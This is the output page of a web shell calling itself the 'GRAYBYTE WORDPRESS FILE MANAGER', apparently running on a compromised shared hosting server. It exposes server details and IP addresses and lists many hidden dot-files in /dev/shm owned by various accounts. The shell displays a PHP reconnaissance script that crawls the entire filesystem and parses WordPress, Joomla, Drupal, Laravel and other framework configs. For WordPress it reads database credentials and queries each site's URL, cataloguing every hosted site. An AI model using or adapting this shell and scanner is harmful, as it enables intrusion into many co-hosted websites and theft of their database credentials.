✘✘ GRAYBYTE WORDPRESS FILE MANAGER ✘✘

​🇳​​🇦​​🇲​​🇪♯➤ server303.web-hosting.com ​🇻​♯➤ 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP 🇾​♯➤ 2025

𝗛𝗢𝗠𝗘 𝗜𝗗 ♯➤ 199.188.205.31 ♯➤ 𝗔𝗗𝗠𝗜𝗡 𝗜𝗗 216.73.216.184
𝗢𝗣𝗧𝗜𝗢𝗡𝗦 ♯ CRL ♯➤ 𝗢𝗞 ┃ WGT ♯➤ 𝗢𝗞 ┃ SDO ♯➤ 𝗢𝗙𝗙 ┃ PKEX ♯➤ 𝗢𝗙𝗙
𝗗𝗘𝗔𝗖𝗧𝗜𝗩𝗔𝗧𝗘𝗗 ♯➤ 𝗔𝗟𝗟 𝗪𝗢𝗥𝗞𝗜𝗡𝗚....

𝗛𝗢𝗠𝗘
𝗖𝗨𝗥𝗥𝗘𝗡𝗧 𝗙𝗜𝗟𝗘 : /dev/shm//.rec
<?php   $r = "/";  function is_valid_domain($domain) {     if (!substr_count($domain, '.')) {         return false;     } 	if (stripos($domain, 'http://') === 0) {         $domain = substr($domain, 7); 		$schema = 'http://';     } 	elseif (stripos($domain, 'https://') === 0) {         $domain = substr($domain, 8); 		$schema = 'https://';     } 	else $schema = 'http://'; 	     if (stripos($domain, 'www.') === 0) {         $domain = substr($domain, 4);     } 	if (strpos($domain, '/') !== false) { 		$split = explode('/', $domain, 2); 		$domain = $split[0]; 	}     $again = $schema . $domain;     return filter_var($again, FILTER_VALIDATE_URL); }  function parse_define_value($line) {     if (preg_match("/define\s*\(\s*['\"]\w+['\"]\s*,\s*['\"](.*)['\"]\s*\)\s*;/", $line, $matches)) {         return $matches[1];     }     return null; } function scan_wp($p) {     $data = file_get_contents($p);     $pattern = "/table_prefix\s*=\s*'([^']*)';/i";     if (preg_match($pattern, $data, $matches)) {         $table_prefix = $matches[1];     } else {         $table_prefix = 'wp_';     }     $lines = array_map('rtrim', file($p));     $conf = [];     foreach ($lines as $line) {         if (preg_match('/define\s*\(\s*[\'"]\s*(DB_USER|DB_HOST|DB_PASSWORD|DB_NAME)\s*[\'"]\s*,/', $line, $matches)) {             $conf[$matches[1]] = parse_define_value($line);         }     }     $mysqli = new mysqli($conf['DB_HOST'], $conf['DB_USER'], $conf['DB_PASSWORD'], $conf['DB_NAME']);     if (!$mysqli->connect_errno) {         if ($result = $mysqli->query("SELECT option_value FROM {$table_prefix}options WHERE option_name = 'siteurl';")) {             $row = $result->fetch_object();             $result->close();             $p = dirname($p); 			$d = is_valid_domain($row->option_value);             if ($d) { 				print "<f>{$p}@@@{$d}@@@wp@@@{$p}</f>\n"; 			}         }         $mysqli->close();     } } function scan_joomla($p) {     $c = file_get_contents($p);     preg_match("/live_site = '(.*?)';/", $c, $m);     if (isset($m[1])) {         $p = dirname($p); 		$d = is_valid_domain($m[1]);         if ($d) { 			print "<f>{$p}@@@{$d}@@@joomla@@@{$p}</f>\n"; 		}     } } function scan_drupal($p) {     $c = file_get_contents($p);     if (preg_match("/\\\$base_url\s*=\s*['\"]([^'\"]+)['\"]/", $c, $m)) {         $p = dirname($p); 		$d = is_valid_domain($m[1]);         if ($d) { 			print "<f>{$p}@@@{$d}@@@drupal@@@{$p}</f>\n"; 		}     } } function scan_opencart($p) {     $c = file_get_contents($p);     $d = null;     if (preg_match("/define\s*\(\s*['\"]HTTPS_SERVER['\"]\s*,\s*['\"]([^'\"]+)['\"]\s*\)/", $c, $m)) {         $d = is_valid_domain($m[1]);     }     if (!$d && preg_match("/define\s*\(\s*['\"]HTTP_SERVER['\"]\s*,\s*['\"]([^'\"]+)['\"]\s*\)/", $c, $m)) {         $d = is_valid_domain($m[1]);     }     if ($d) {         $p = dirname($p);         print "<f>{$p}@@@{$d}@@@opencart@@@{$p}</f>\n";     } } function scan_laravel($p) {     $c = @file_get_contents($p);     if (!$c) return;     if (preg_match("/^\s*APP_URL\s*=\s*['\"]?(https?:\/\/[^'\"]+)['\"]?/m", $c, $m)) {         $path_root = dirname($p);         if (!@is_file($path_root . '/artisan')) return;         $path_public = $path_root . '/public';         if (!@is_dir($path_public)) {             $path_public = $path_root;         }         $d = is_valid_domain($m[1]);         if ($d) {             print "<f>{$path_public}@@@{$d}@@@laravel@@@{$p}</f>\n";         }     } } function scan_codeigniter3($p) {     $c = @file_get_contents($p);     if (!$c) return;     if (preg_match("/\\\$config\s*\[\s*['\"]base_url['\"]\s*\]\s*=\s*['\"](https?:\/\/[^'\"]+)['\"]/", $c, $m)) {         $path_root = dirname(dirname($p));         $d = is_valid_domain($m[1]);         if ($d) {             print "<f>{$path_root}@@@{$d}@@@codeigniter3@@@{$p}</f>\n";         }     } } function scan_codeigniter4($p) {     $c = @file_get_contents($p);     if (!$c) return;     if (preg_match("/\\\$baseURL\s*=\s*['\"](https?:\/\/[^'\"]+)['\"]/", $c, $m)) {         $path_root = dirname(dirname(dirname($p)));         $path_public = $path_root . '/public';         if (!@is_dir($path_public)) {             $path_public = $path_root;         }         $d = is_valid_domain($m[1]);         if ($d) {             print "<f>{$path_public}@@@{$d}@@@codeigniter4@@@{$p}</f>\n";         }     } } function scan_cakephp($p) {     $c = @file_get_contents($p);     if (!$c) return;     if (preg_match("/['\"]fullBaseUrl['\"]\s*=>\s*['\"](https?:\/\/[^'\"]+)['\"]/", $c, $m) ||         preg_match("/['\"]fullBaseUrl['\"]\s*=>\s*env\s*\(\s*['\"][^'\"]+['\"]\s*,\s*['\"](https?:\/\/[^'\"]+)['\"]\s*\)/", $c, $m)) {         $path_root = dirname($p);         $path_webroot = $path_root . '/webroot';         if (!@is_dir($path_webroot)) {             $path_webroot = $path_root;         }         $d = is_valid_domain($m[1]);         if ($d) {             print "<f>{$path_webroot}@@@{$d}@@@cakephp@@@{$p}</f>\n";         }     } } function scan_symfony($p) {     $c = @file_get_contents($p);     if (!$c) return;     if (preg_match("/^\s*APP_URL\s*=\s*['\"]?(https?:\/\/[^'\"]+)['\"]?/m", $c, $m) ||         preg_match("/^\s*PUBLIC_URL\s*=\s*['\"]?(https?:\/\/[^'\"]+)['\"]?/m", $c, $m)) {         $path_root = dirname($p);         if (!@is_file($path_root . '/bin/console')) return;         $path_public = $path_root . '/public';         if (@is_dir($path_public)) {             $path_out = $path_public;         } else {             $path_web = $path_root . '/web';             $path_out = @is_dir($path_web) ? $path_web : $path_root;         }         $d = is_valid_domain($m[1]);         if ($d) {             print "<f>{$path_out}@@@{$d}@@@symfony@@@{$p}</f>\n";         }     } } function scan_kohana($p) {     $c = @file_get_contents($p);     if (!$c) return;     if (preg_match("/['\"]base_url['\"]\s*=>\s*['\"](https?:\/\/[^'\"]+)['\"]/", $c, $m)) {         $path_root = (strpos($p, 'application/') !== false) ? dirname(dirname($p)) : dirname($p);         $d = is_valid_domain($m[1]);         if ($d) {             print "<f>{$path_root}@@@{$d}@@@kohana@@@{$p}</f>\n";         }     } } function scan_fuelphp($p) {     $c = @file_get_contents($p);     if (!$c) return;     if (preg_match("/['\"]base_url['\"]\s*=>\s*['\"](https?:\/\/[^'\"]+)['\"]/", $c, $m)) {         $path_fuel = dirname(dirname($p));         $path_root = dirname($path_fuel);         $path_public = $path_root . '/public';         if (!@is_dir($path_public)) {             $path_public = $path_root;         }         $d = is_valid_domain($m[1]);         if ($d) {             print "<f>{$path_public}@@@{$d}@@@fuelphp@@@{$p}</f>\n";         }     } } function scan_bitrix($p) {     $c = @file_get_contents($p);     if (!$c || strpos($p, 'bitrix') === false) return;     if (preg_match("/['\"]value['\"]\s*=>\s*['\"](https?:\/\/[^'\"]+)['\"]/", $c, $m)) {         $path_root = dirname(dirname($p));         $d = is_valid_domain($m[1]);         if ($d) {             print "<f>{$path_root}@@@{$d}@@@bitrix@@@{$p}</f>\n";         }     } } function scan($path) {     $existed = ["seabrosdiving.com"];     if ($dir = @opendir($path)) {         while (false !== ($file = readdir($dir))) { 			if ($path === '/' || $path === '') { 				$p = $path . $file; 			} else { 				$p = $path . '/' . $file; 			}             if ($file != '.' && $file != '..') {                 $found = false;                 foreach ($existed as $domain) {                     if (strstr($p, $domain)) {                         $found = true;                         break;                     }                 }                 if ($found) {                     continue;                 }                 if (is_link($p)) {                     continue;                 } elseif (is_dir($p)) {                     scan($p);                 } elseif ($file == 'wp-config.php') {                     scan_wp($p);                 } elseif ($file == 'configuration.php') {                     scan_joomla($p);                 } elseif ($file == 'settings.php' && (strpos($p, 'sites/') !== false || strpos($p, 'sites\\') !== false)) {                     scan_drupal($p);                 } elseif ($file == 'config.php' && strpos(@file_get_contents($p), 'HTTP_SERVER') !== false) {                     scan_opencart($p);                 } elseif ($file == '.settings.php' && strpos($p, 'bitrix') !== false) {                     scan_bitrix($p);                 } elseif ($file == '.env') {                     scan_laravel($p);                     scan_symfony($p);                 } elseif ($file == 'config.php' && strpos($p, 'application/config') !== false) {                     scan_codeigniter3($p);                 } elseif ($file == 'App.php' && strpos($p, 'app/Config') !== false) {                     scan_codeigniter4($p);                 } elseif ($file == 'app.php' && strpos($p, 'config/') !== false) {                     scan_cakephp($p);                 } elseif (($file == 'bootstrap.php' || $file == 'url.php') && strpos($p, 'application/') !== false) {                     scan_kohana($p);                 } elseif ($file == 'config.php' && strpos($p, 'fuel/') !== false) {                     scan_fuelphp($p);                 } elseif ($file == 'config.php' && strpos(@file_get_contents($p), 'HTTP_SERVER') !== false) {                     scan_opencart($p);                 }             }         }     } } scan($r); die('!ended!'); 


Current_dir [ 𝗪𝗥𝗜𝗧𝗘𝗔𝗕𝗟𝗘 ] Document_root [ 𝗪𝗥𝗜𝗧𝗘𝗔𝗕𝗟𝗘 ]


[ Back ]
𝗡𝗔𝗠𝗘
𝗦𝗜𝗭𝗘
𝗟𝗔𝗦𝗧 𝗧𝗢𝗨𝗖𝗛
𝗨𝗦𝗘𝗥
𝗦𝗧𝗔𝗧𝗨𝗦
𝗙𝗨𝗡𝗖𝗧𝗜𝗢𝗡𝗦
..
--
24 Jun 2026 8.48 AM
root / root
0755
duet
--
4 May 2026 11.49 AM
whitksod / whitksod
0000
lsws
--
25 Jun 2026 4.19 AM
nobody / nobody
0750
.389721b0
0.482 KB
23 Jun 2026 12.26 AM
shrowixp / shrowixp
0755
.bind
9.228 KB
11 Mar 2026 11.02 PM
8942 / 8904
0644
.binding
0.057 KB
16 Mar 2026 4.24 AM
1401 / 1357
0644
.comp
0.053 KB
18 Apr 2026 3.32 AM
bluevljb / bluevljb
0644
.component
0.055 KB
10 Feb 2026 2.55 AM
4398 / 4314
0644
.dat
0.052 KB
5 May 2026 5.14 AM
maganrce / maganrce
0644
.data
0.047 KB
2 May 2026 7.35 AM
zahemiix / zahemiix
0644
.data_chunk
9.228 KB
11 Mar 2026 11.03 PM
8942 / 8904
0644
.dchunk
1.392 KB
2 Jun 2026 12.38 AM
authyupq / authyupq
0644
.dda1842a
0.493 KB
20 Jun 2026 3.05 PM
shrowixp / shrowixp
0755
.desc
0.048 KB
13 Mar 2026 11.52 PM
6871 / 6833
0644
.descriptor
0.057 KB
1 Mar 2026 9.16 AM
1401 / 1357
0644
.elem
0.062 KB
17 Feb 2026 5.04 PM
4398 / 4314
0644
.element
0.05 KB
4 Mar 2026 9.46 PM
macrstxg / macrstxg
0644
.ent
0.049 KB
17 Feb 2026 5.37 PM
4398 / 4314
0644
.entry
0.05 KB
4 Mar 2026 9.48 PM
macrstxg / macrstxg
0644
.fac
0.055 KB
18 Feb 2026 2.17 PM
pndpeesp / pndpeesp
0644
.factor
0.044 KB
6 Feb 2026 10.54 AM
purekthj / purekthj
0644
.flag
4.442 KB
11 Feb 2026 3.29 PM
8201 / 8163
0644
.flexible-monitor.php
10.844 KB
23 Jun 2026 12.26 AM
shrowixp / shrowixp
0644
.flg
0.209 KB
25 Jun 2026 4.26 AM
zahemiix / zahemiix
0644
.hld
0.052 KB
16 Mar 2026 9.11 AM
1401 / 1357
0644
.holder
0.054 KB
19 Mar 2026 10.16 AM
8201 / 8163
0644
.item
0.05 KB
18 Mar 2026 12.05 PM
authyupq / authyupq
0644
.itm
2.539 KB
3 Mar 2026 8.13 PM
8201 / 8163
0644
.k
1.039 KB
24 Jun 2026 4.37 PM
zahemiix / zahemiix
0644
.key
0.049 KB
4 Mar 2026 9.47 PM
macrstxg / macrstxg
0644
.marker
0.979 KB
19 Mar 2026 9.34 AM
8201 / 8163
0644
.mrk
1.581 KB
10 Apr 2026 6.49 PM
pndpeesp / pndpeesp
0644
.obj
0.047 KB
12 Apr 2026 9.54 PM
8201 / 8163
0644
.object
9.228 KB
11 Mar 2026 11.03 PM
8942 / 8904
0644
.parameter_group
1.822 KB
10 Mar 2026 5.29 AM
pndpeesp / pndpeesp
0644
.pgrp
1.646 KB
8 Feb 2026 12.38 PM
4398 / 4314
0644
.pointer
0.053 KB
20 Mar 2026 6.05 AM
zahemiix / zahemiix
0644
.property_set
0.048 KB
28 Feb 2026 1.25 PM
1401 / 1357
0644
.pset
4.245 KB
20 Feb 2026 6.29 PM
1401 / 1357
0644
.ptr
0.046 KB
4 Mar 2026 9.48 PM
macrstxg / macrstxg
0644
.rec
9.222 KB
4 Apr 2026 1.30 AM
6871 / 6833
0644
.record
4.245 KB
4 Mar 2026 6.08 PM
6871 / 6833
0644
.ref
4.464 KB
24 Jun 2026 5.43 PM
macrstxg / macrstxg
0644
.reference
0.058 KB
23 Jun 2026 12.44 AM
ifexynwl / ifexynwl
0644
.res
0.045 KB
18 Feb 2026 3.32 AM
4398 / 4314
0644
.resource
4.305 KB
13 Apr 2026 3.47 PM
8201 / 8163
0644
.sym
0.044 KB
4 Mar 2026 9.43 PM
macrstxg / macrstxg
0644
.symbol
0.047 KB
4 May 2026 5.47 AM
siyauflf / siyauflf
0644
.tkn
0.047 KB
27 Mar 2026 2.11 PM
zahemiix / zahemiix
0644
.token
0.055 KB
10 Mar 2026 11.32 AM
9517 / 9479
0644
.val
4.219 KB
4 May 2026 7.12 AM
purekthj / purekthj
0644
.value
0.049 KB
18 Mar 2026 3.27 AM
8201 / 8163
0644
PostgreSQL.1912804781
14.641 KB
18 Jun 2026 8.36 AM
postgres / postgres
0600
dbus-daemon-1e6e52
0 KB
16 Mar 2026 8.05 AM
1401 / 1357
0700

✘✘ GRAYBYTE WORDPRESS FILE MANAGER @ 2026 CONTACT ME ✘✘
Static GIF Static GIF